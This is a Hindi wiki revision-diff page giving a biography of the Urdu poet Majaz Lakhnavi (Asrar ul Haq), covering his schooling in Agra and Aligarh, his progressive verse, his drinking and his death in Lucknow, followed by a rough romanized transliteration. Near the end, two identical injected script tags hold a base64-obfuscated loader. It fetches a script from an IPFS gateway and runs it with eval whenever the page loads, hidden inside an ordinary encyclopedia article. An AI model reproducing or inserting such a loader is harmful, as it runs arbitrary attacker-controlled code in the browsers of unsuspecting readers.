Difference between revisions of "मजाज़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " जिले " to " ज़िले ")
m (Text replace - "काफी " to "काफ़ी ")
Line 36: Line 36:
 
इनके वालिद का नाम चौधरी सिराज उल हक़ था। चौधरी सिराज उल हक़ अपने इलाके में पहले आदमी थे, जिन्होंने वकालत की डिग्री हासिल की थी। वे रजिस्ट्री विभाग में सरकारी मुलाजिम थे। वालिद चाहते थे कि उनका बेटा इन्जीनियर बने। इस हसरत से उन्होंने अपने बेटे असरार का दाखिला आगरा के सेण्ट जांस कालेज में इण्टर साइन्स में कराया। यह बात कोई 1929 की है। मगर असरार की लकीरों में तो शायद कुछ और ही लिखा था। आगरा में उन्हें फानी, जज्बी, मैकश अकबराबादी जैसे लोगों की सोहबत मिली। इस सोहबत का असर यह हुआ कि उनका रूझान बजाय इन्जीनियर बनने के गज़ल लिखने की तरफ हो गया। ‘असरार’ नाम के साथ ‘शहीद’ तख़ल्लुस जुड गया। कहा जाता है कि मजाज़ की शुरूआती ग़ज़लों को फानी ने इस्लाह किया। यह अलग बात है कि मजाज़ ने उनसे इस्लाह तो कराया, परन्तु उनकी ग़ज़लों का प्रभाव अपने ऊपर नहीं पडने दिया। यहाँ उन्होने गज़लगोई की बारीकियों और अरूज़ (व्याकरण) को सीखा । इस दौरान उनमें दार्शनिकता का पुट भी आया, जिसका उनमें अभाव था। बाद में मजाज़ लगातार निखरते गए।
 
इनके वालिद का नाम चौधरी सिराज उल हक़ था। चौधरी सिराज उल हक़ अपने इलाके में पहले आदमी थे, जिन्होंने वकालत की डिग्री हासिल की थी। वे रजिस्ट्री विभाग में सरकारी मुलाजिम थे। वालिद चाहते थे कि उनका बेटा इन्जीनियर बने। इस हसरत से उन्होंने अपने बेटे असरार का दाखिला आगरा के सेण्ट जांस कालेज में इण्टर साइन्स में कराया। यह बात कोई 1929 की है। मगर असरार की लकीरों में तो शायद कुछ और ही लिखा था। आगरा में उन्हें फानी, जज्बी, मैकश अकबराबादी जैसे लोगों की सोहबत मिली। इस सोहबत का असर यह हुआ कि उनका रूझान बजाय इन्जीनियर बनने के गज़ल लिखने की तरफ हो गया। ‘असरार’ नाम के साथ ‘शहीद’ तख़ल्लुस जुड गया। कहा जाता है कि मजाज़ की शुरूआती ग़ज़लों को फानी ने इस्लाह किया। यह अलग बात है कि मजाज़ ने उनसे इस्लाह तो कराया, परन्तु उनकी ग़ज़लों का प्रभाव अपने ऊपर नहीं पडने दिया। यहाँ उन्होने गज़लगोई की बारीकियों और अरूज़ (व्याकरण) को सीखा । इस दौरान उनमें दार्शनिकता का पुट भी आया, जिसका उनमें अभाव था। बाद में मजाज़ लगातार निखरते गए।
 
==जीवन का निर्णायक मोड़==
 
==जीवन का निर्णायक मोड़==
[[आगरा]] के बाद वे [[1931]] में बी.ए. करने [[अलीगढ़]] चले गए। अलीगढ़ का यह दौर उनके जीवन का निर्णायक मोड़ साबित हुआ। इस शहर में उनका राब्ता मंटो, [[इस्मत चुगताई]], अली सरदार ज़ाफरी, सिब्ते हसन, जाँ निसार अख़्तर जैसे नामचीन शायरों से हुआ। इनकी सोहबत ने मजाज़ के कलम को और भी कशिश और वुसअत बख्शी। यहां उन्होंने अपना तखल्लुस ‘मजाज़’ अपनाया। इसके बाद मजाज़ गज़ल की दुनिया में बड़ा सितारा बनकर उभरे और उर्दू अदब के फलक पर छा गये। अलीगढ़ में मजाज़ की आत्मा बसती थी। कहा जाता है कि मजाज़ और अलीगढ़ दोनों एक दूसरे के पूरक थे। एक दूसरे के लिए बने थे। अपने स्कूली जीवन में ही मजाज़ अपनी शायरी और अपने व्यक्तित्व को लेकर इतने मकबूल हो गए थे कि हॉस्टल की लड़कियां मजाज़ के गीत गाया करती थीं और उनके साथ अपने सपने बुना करती थीं। अलीगढ़ की नुमाईश, यूनीवर्सिटी, वहां की रंगीनियों आदि को लेकर मजाज़ ने काफी लिखा-पढ़ा। मजाज़ की शायरी के दो रंग है-पहले रंग में वे इश्किया गज़लकार नजर आते हैं वहीं दूसरा रंग उनके इन्कलाब़ी शायर होने का मुज़ाहिरा करता है। अलीगढ़ में ही उनके कृतित्व को एक नया विस्तार मिला। वे प्रगतिशील लेखक समुदाय से जुड़ गये। ‘मजदूरों का गीत’ हो या ‘इंकलाब जिंदाबाद’, मजाज ने अपनी बात बहुत प्रभावशाली तरीके से कही।[[चित्र:Majaz-stamp.jpg|thumb|left|सम्मान में जारी [[डाक  टिकट]]]]
+
[[आगरा]] के बाद वे [[1931]] में बी.ए. करने [[अलीगढ़]] चले गए। अलीगढ़ का यह दौर उनके जीवन का निर्णायक मोड़ साबित हुआ। इस शहर में उनका राब्ता मंटो, [[इस्मत चुगताई]], अली सरदार ज़ाफरी, सिब्ते हसन, जाँ निसार अख़्तर जैसे नामचीन शायरों से हुआ। इनकी सोहबत ने मजाज़ के कलम को और भी कशिश और वुसअत बख्शी। यहां उन्होंने अपना तखल्लुस ‘मजाज़’ अपनाया। इसके बाद मजाज़ गज़ल की दुनिया में बड़ा सितारा बनकर उभरे और उर्दू अदब के फलक पर छा गये। अलीगढ़ में मजाज़ की आत्मा बसती थी। कहा जाता है कि मजाज़ और अलीगढ़ दोनों एक दूसरे के पूरक थे। एक दूसरे के लिए बने थे। अपने स्कूली जीवन में ही मजाज़ अपनी शायरी और अपने व्यक्तित्व को लेकर इतने मकबूल हो गए थे कि हॉस्टल की लड़कियां मजाज़ के गीत गाया करती थीं और उनके साथ अपने सपने बुना करती थीं। अलीगढ़ की नुमाईश, यूनीवर्सिटी, वहां की रंगीनियों आदि को लेकर मजाज़ ने काफ़ी लिखा-पढ़ा। मजाज़ की शायरी के दो रंग है-पहले रंग में वे इश्किया गज़लकार नजर आते हैं वहीं दूसरा रंग उनके इन्कलाब़ी शायर होने का मुज़ाहिरा करता है। अलीगढ़ में ही उनके कृतित्व को एक नया विस्तार मिला। वे प्रगतिशील लेखक समुदाय से जुड़ गये। ‘मजदूरों का गीत’ हो या ‘इंकलाब जिंदाबाद’, मजाज ने अपनी बात बहुत प्रभावशाली तरीके से कही।[[चित्र:Majaz-stamp.jpg|thumb|left|सम्मान में जारी [[डाक  टिकट]]]]
 
==तरक्कीपसन्द शायर==
 
==तरक्कीपसन्द शायर==
 
अलीगढ़ का दौर उनकी जिन्दगी को नया मोड़ देने वाला रहा। आगरा में जहां वे इश्किया शायरी तक सीमित थे, अलीगढ़ में उस शायरी को नया आयाम मिला। आगरा से अलीगढ़ तक आते आते शबाब, इन्कलाब में तब्दील हो गया। 1930-40 का अन्तराल देश दुनिया में बड़ी तब्दीलियों का दौर था। राष्ट्रीय आंदोलन में प्रगतिशीलता का मोड़ आ चुका था। साहित्यकारों की बड़ी फौज़ इन्कलाब के गीत गा रही थीं। अलीगढ़ इससे अछूता कैसे रह सकता था। अलीगढ़ में भी इन विचारों का दौर आ चुका था। तरक्कीपसंद कहे जाने वाले तमाम कवि-लेखकों का अलीगढ़ आना-जाना हो रहा था। डॉ. अशरफ यूरोप से लौट आए थे, अख्तर हुसैन रामपुरी बी.ए. करने बाद आफ़ताब हॉस्टल में रह रहे थे । सब्त हसन भी अलीगढ़ में ही थे। सज्जाद जहीर ऑक्सफोर्ड में बहुत दिनों तक रहने के बाद अलीगढ़ आ गये थे। अंगे्रजी हुकूमत के दौरान कई तरक्कीपसन्द कही जाने वाली पत्र पत्रिकाएं प्रकाशित होकर ’जब्त ’ हो रही थीं, जाहिर है कि इन घटनाओं का असर मजाज़ और उनकी शायरी पर पडना लाजिमी थी। डॉ. अशरफ, अख्तर रायपुरी, सबत हसन, सरदार जाफरी, जज्बी और ऐसे दूसरे समाजवादी साथियों की सोहबत में मजाज भी तरक्की पसंद तथा इंकलाबी शायरों की सोहबत में शामिल हो गये। ऐसे माहौल में मजाज ने ’इंकलाब’ जैसी नज्म बुनी। इसके बाद उन्होंने रात और रेल, नजर, अलीगढ, नजर खालिदा, अंधेरी रात का मुसाफिर ,सरमायादारी, जैसे रचनाएं उर्दू अदबी दुनिया को दीं। मजाज़ अब बहुत मकबूल हो चुके थे। [[1935]] में वे आल इण्डिया रेडियो की [[पत्रिका]] ‘आवाज’ के सहायक संपादक हो कर मजाज़ [[दिल्ली]] आ गये। दिल्ली में नाकाम इश्क ने उन्हें ऐसे दर्द दिये कि जो मजाज़ को ताउम्र सालते रहे। यह पत्रिका बमुश्किल एक साल ही चल सकी, सो वे वापस लखनऊ आ गए। [[1939]] में सिब्ते हसन ,सरदार जाफरी और मजाज़ ने मिलकर ’नया अदब’ का सम्पादन किया जो आर्थिक कठिनाईयों की वजह से ज्यादा दिन तक नहीं चल सका।  इश्क में नाकामी से मजाज़ ने शराब पीना शुरू कर दिया। शराब की लत इस कदर बढ़ी कि लोगों ने कहना शुरू कर दिया कि मजाज़ शराब को नहीं, शराब मजाज़ को पी रही है। दिल्ली से विदा होते वक्त उन्होंने कहा-
 
अलीगढ़ का दौर उनकी जिन्दगी को नया मोड़ देने वाला रहा। आगरा में जहां वे इश्किया शायरी तक सीमित थे, अलीगढ़ में उस शायरी को नया आयाम मिला। आगरा से अलीगढ़ तक आते आते शबाब, इन्कलाब में तब्दील हो गया। 1930-40 का अन्तराल देश दुनिया में बड़ी तब्दीलियों का दौर था। राष्ट्रीय आंदोलन में प्रगतिशीलता का मोड़ आ चुका था। साहित्यकारों की बड़ी फौज़ इन्कलाब के गीत गा रही थीं। अलीगढ़ इससे अछूता कैसे रह सकता था। अलीगढ़ में भी इन विचारों का दौर आ चुका था। तरक्कीपसंद कहे जाने वाले तमाम कवि-लेखकों का अलीगढ़ आना-जाना हो रहा था। डॉ. अशरफ यूरोप से लौट आए थे, अख्तर हुसैन रामपुरी बी.ए. करने बाद आफ़ताब हॉस्टल में रह रहे थे । सब्त हसन भी अलीगढ़ में ही थे। सज्जाद जहीर ऑक्सफोर्ड में बहुत दिनों तक रहने के बाद अलीगढ़ आ गये थे। अंगे्रजी हुकूमत के दौरान कई तरक्कीपसन्द कही जाने वाली पत्र पत्रिकाएं प्रकाशित होकर ’जब्त ’ हो रही थीं, जाहिर है कि इन घटनाओं का असर मजाज़ और उनकी शायरी पर पडना लाजिमी थी। डॉ. अशरफ, अख्तर रायपुरी, सबत हसन, सरदार जाफरी, जज्बी और ऐसे दूसरे समाजवादी साथियों की सोहबत में मजाज भी तरक्की पसंद तथा इंकलाबी शायरों की सोहबत में शामिल हो गये। ऐसे माहौल में मजाज ने ’इंकलाब’ जैसी नज्म बुनी। इसके बाद उन्होंने रात और रेल, नजर, अलीगढ, नजर खालिदा, अंधेरी रात का मुसाफिर ,सरमायादारी, जैसे रचनाएं उर्दू अदबी दुनिया को दीं। मजाज़ अब बहुत मकबूल हो चुके थे। [[1935]] में वे आल इण्डिया रेडियो की [[पत्रिका]] ‘आवाज’ के सहायक संपादक हो कर मजाज़ [[दिल्ली]] आ गये। दिल्ली में नाकाम इश्क ने उन्हें ऐसे दर्द दिये कि जो मजाज़ को ताउम्र सालते रहे। यह पत्रिका बमुश्किल एक साल ही चल सकी, सो वे वापस लखनऊ आ गए। [[1939]] में सिब्ते हसन ,सरदार जाफरी और मजाज़ ने मिलकर ’नया अदब’ का सम्पादन किया जो आर्थिक कठिनाईयों की वजह से ज्यादा दिन तक नहीं चल सका।  इश्क में नाकामी से मजाज़ ने शराब पीना शुरू कर दिया। शराब की लत इस कदर बढ़ी कि लोगों ने कहना शुरू कर दिया कि मजाज़ शराब को नहीं, शराब मजाज़ को पी रही है। दिल्ली से विदा होते वक्त उन्होंने कहा-

Revision as of 14:11, 1 November 2014

majaz
poora nam asararul haq majaz
any nam majaz lakhanavi
janm 19 aktoobar, 1911
janm bhoomi barabanki, uttar pradesh
mrityu 5 disambar, 1955
karm-kshetr urdoo shayar, vaicharik lekhan
bhasha urdoo, arabi, hiandi
nagarikata bharatiy
any janakari asararul haq majaz ka shumar eshiya ke mahanatam kaviyoan mean kiya jata hai. asararul haq majaz ki shayari ka anuvad hiandi, roosi, aangrezi adi kee bhashaoan mean ho chuka hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

majaz lakhanavi (poora nam: asararul haq majaz, aangrezi:Asarar Ul Huq Majaaj, janm: 19 aktoobar, 1911 – mrityu:5 disambar, 1955 prasiddh shayar the jinaka janm 19 aktoobar, 1911 ko uttar pradesh ke barabanki zile ke roodauli gaanv mean hua tha.

jivan parichay

inake valid ka nam chaudhari siraj ul haq tha. chaudhari siraj ul haq apane ilake mean pahale adami the, jinhoanne vakalat ki digri hasil ki thi. ve rajistri vibhag mean sarakari mulajim the. valid chahate the ki unaka beta injiniyar bane. is hasarat se unhoanne apane bete asarar ka dakhila agara ke sent jaans kalej mean intar sains mean karaya. yah bat koee 1929 ki hai. magar asarar ki lakiroan mean to shayad kuchh aur hi likha tha. agara mean unhean phani, jajbi, maikash akabarabadi jaise logoan ki sohabat mili. is sohabat ka asar yah hua ki unaka roojhan bajay injiniyar banane ke gazal likhane ki taraph ho gaya. ‘asarar’ nam ke sath ‘shahid’ takhallus jud gaya. kaha jata hai ki majaz ki shurooati gazaloan ko phani ne islah kiya. yah alag bat hai ki majaz ne unase islah to karaya, parantu unaki gazaloan ka prabhav apane oopar nahian padane diya. yahaan unhone gazalagoee ki barikiyoan aur arooz (vyakaran) ko sikha . is dauran unamean darshanikata ka put bhi aya, jisaka unamean abhav tha. bad mean majaz lagatar nikharate ge.

jivan ka nirnayak mo d

agara ke bad ve 1931 mean bi.e. karane aligadh chale ge. aligadh ka yah daur unake jivan ka nirnayak mo d sabit hua. is shahar mean unaka rabta manto, ismat chugataee, ali saradar zaphari, sibte hasan, jaan nisar akhtar jaise namachin shayaroan se hua. inaki sohabat ne majaz ke kalam ko aur bhi kashish aur vusat bakhshi. yahaan unhoanne apana takhallus ‘majaz’ apanaya. isake bad majaz gazal ki duniya mean b da sitara banakar ubhare aur urdoo adab ke phalak par chha gaye. aligadh mean majaz ki atma basati thi. kaha jata hai ki majaz aur aligadh donoan ek doosare ke poorak the. ek doosare ke lie bane the. apane skooli jivan mean hi majaz apani shayari aur apane vyaktitv ko lekar itane makabool ho ge the ki h aaustal ki l dakiyaan majaz ke git gaya karati thian aur unake sath apane sapane buna karati thian. aligadh ki numaeesh, yoonivarsiti, vahaan ki ranginiyoan adi ko lekar majaz ne kafi likha-padha. majaz ki shayari ke do rang hai-pahale rang mean ve ishkiya gazalakar najar ate haian vahian doosara rang unake inkalab़i shayar hone ka muzahira karata hai. aligadh mean hi unake krititv ko ek naya vistar mila. ve pragatishil lekhak samuday se ju d gaye. ‘majadooroan ka git’ ho ya ‘iankalab jiandabad’, majaj ne apani bat bahut prabhavashali tarike se kahi.[[chitr:Majaz-stamp.jpg|thumb|left|samman mean jari dak tikat]]

tarakkipasand shayar

aligadh ka daur unaki jindagi ko naya mo d dene vala raha. agara mean jahaan ve ishkiya shayari tak simit the, aligadh mean us shayari ko naya ayam mila. agara se aligadh tak ate ate shabab, inkalab mean tabdil ho gaya. 1930-40 ka antaral desh duniya mean b di tabdiliyoan ka daur tha. rashtriy aandolan mean pragatishilata ka mo d a chuka tha. sahityakaroan ki b di phauz inkalab ke git ga rahi thian. aligadh isase achhoota kaise rah sakata tha. aligadh mean bhi in vicharoan ka daur a chuka tha. tarakkipasand kahe jane vale tamam kavi-lekhakoan ka aligadh ana-jana ho raha tha. d aau. asharaph yoorop se laut ae the, akhtar husain ramapuri bi.e. karane bad afatab h aaustal mean rah rahe the . sabt hasan bhi aligadh mean hi the. sajjad jahir aauksaphord mean bahut dinoan tak rahane ke bad aligadh a gaye the. aangehraji hukoomat ke dauran kee tarakkipasand kahi jane vali patr patrikaean prakashit hokar ’jabt ’ ho rahi thian, jahir hai ki in ghatanaoan ka asar majaz aur unaki shayari par padana lajimi thi. d aau. asharaph, akhtar rayapuri, sabat hasan, saradar japhari, jajbi aur aise doosare samajavadi sathiyoan ki sohabat mean majaj bhi tarakki pasand tatha iankalabi shayaroan ki sohabat mean shamil ho gaye. aise mahaul mean majaj ne ’iankalab’ jaisi najm buni. isake bad unhoanne rat aur rel, najar, aligadh, najar khalida, aandheri rat ka musaphir ,saramayadari, jaise rachanaean urdoo adabi duniya ko dian. majaz ab bahut makabool ho chuke the. 1935 mean ve al indiya rediyo ki patrika ‘avaj’ ke sahayak sanpadak ho kar majaz dilli a gaye. dilli mean nakam ishk ne unhean aise dard diye ki jo majaz ko taumr salate rahe. yah patrika bamushkil ek sal hi chal saki, so ve vapas lakhanoo a ge. 1939 mean sibte hasan ,saradar japhari aur majaz ne milakar ’naya adab’ ka sampadan kiya jo arthik kathinaeeyoan ki vajah se jyada din tak nahian chal saka. ishk mean nakami se majaz ne sharab pina shuroo kar diya. sharab ki lat is kadar badhi ki logoan ne kahana shuroo kar diya ki majaz sharab ko nahian, sharab majaz ko pi rahi hai. dilli se vida hote vakt unhoanne kaha-

rookhsat e dilli! teri mahaphil se ab jata hooan maian nauhagar jata hooan maian nala-b-lab jata hooan maian

nidhan

5 disambar 1955 ko lakhanoo mean hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>